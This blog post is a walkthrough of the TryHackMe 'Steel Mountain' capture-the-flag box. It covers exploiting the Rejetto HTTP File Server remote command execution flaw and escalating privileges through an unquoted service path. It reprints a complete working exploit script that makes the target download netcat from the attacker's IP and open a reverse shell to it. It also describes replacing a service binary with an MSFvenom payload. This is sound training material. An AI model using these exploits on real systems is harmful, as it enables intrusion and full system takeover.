CTF Walkthroughs, TryHackMe

TryHackMe – Steel Mountain Walkthrough

January 30, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Windows box that involved gaining initial access through a remote command execution vulnerability in the Rejetto HTTP File Server web application and exploiting a unquoted service path vulnerability in the Advanced System Care 9 application to gain SYSTEM level access

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
  • -oA to save the output in all formats available

The main ports that should be enumerated are 80/8080, 139/445 and 135.

When running another Nmap scan using the -p- flag to scan all ports, a few more ports are found although they don’t seem to be useful for now.

Enumerating HTTP

A web application called HTTP File Server, version 2.3 (as seen under server information), seems to be running on port 8080:

It looks like the application was made by a developer called “Rejetto”:

Using SearchSploit to look for known vulnerabilities in this version of HTTP File Server. Since the name was very common, searching for the name of the developer was a better option:

Found and mirrored a working exploit, used grep to find the CVE number:

Exploiting HTPP File w/ Metasploit

Starting Metasploit and searching for the web application:

Viewing the available options and setting the following:

  • RHOST to specify the target host
  • RPORT to specify the target port
  • SRVHOST to specify the IP address to HOST the exploit on
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to

Running the exploit has granted a meterpreter shell connected to the target:

Privilege Escalation

Uploading the PowerUp Powershell enumeration script onto the machine:

Running the script – an unquoted service path was found. This can be exploited by placing an executable file anywhere in the path of ASCService.exe that has a name that starts with the name of the next folder in the path used by the service.

The first step is to generate some shellcode using MSFvenom with the following flags:

  • -p to specify the payload type, in this case the Windows reverse TCP shell
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to
  • -e to specify the encoder, in this case shikata_ga_nai
  • -f to specify the format, in this case exe

Navigating to the folder of the executable

Stopping the Advanced System Care service using the following command:

net stop AdvancedSystemCareService9

Replacing its executable with the malicious file created by MSFvenom:

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Starting the Advanced System Care service, this grants a SYSTEM shell:

Exploitation w/out Metasploit

The following exploit (39161.py from Exploit DB) can be used to manually exploit this vulnerability. Looking at the description, it requires a Netcat Windows binary to be hosted on the local Kali host so that it can be downloaded and executed by the target host.

Updating the local IP address and port accordingly:

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#	       It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#	       It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
 
#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!


import urllib2
import sys

try:
	def script_create():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

	def execute_script():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

	def nc_run():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

	ip_addr = "10.9.228.20" #local IP address
	local_port = "443" # Local Port number
	vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
	save= "save|" + vbs
	vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
	exe= "exec|"+vbs2
	vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
	exe1= "exec|"+vbs3
	script_create()
	execute_script()
	nc_run()
except:
	print """[.]Something went wrong..!
	Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
	Don't forgot to change the Local IP address and Port number on the script"""

Copying the Netcat Windows binary that comes with Kali to the working directory and starting a Python web server to host it:

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

The script had to be run twice for it to work, this granted a reverse shell:

Privilege Escalation w/out Metasploit

Transferring the winPEAS script using Certutil and the Python web server:

Running the executable:

It has found some unquoted service paths as PowerUp did:

The Get-Service Powershell utility can be used to find out the service name:

Finding out the exact service name for the Advanced System Care service:

Generating a malicious binary as done in the earlier privilege escalation:

Navigating to the IObit directory which contains the folder where the executable for Advanced System Care is stored:

Transferring the executable using Powershell and the Python web server:

Setting up a Netcat listener as done in the earlier steps:

Restarting the service grants a reverse shell as SYSTEM:

Conclusion

This was a really fun box, the HTTP File Server application is quite common in CTF challenges so this wasn’t anything new, although the fact that TryHackMe encourages students to exploit machines using both Metasploit and manual exploits is a really good way to develop the right mind set required for penetration testing.

The privilege escalation vector was a quite common one, but still good practice.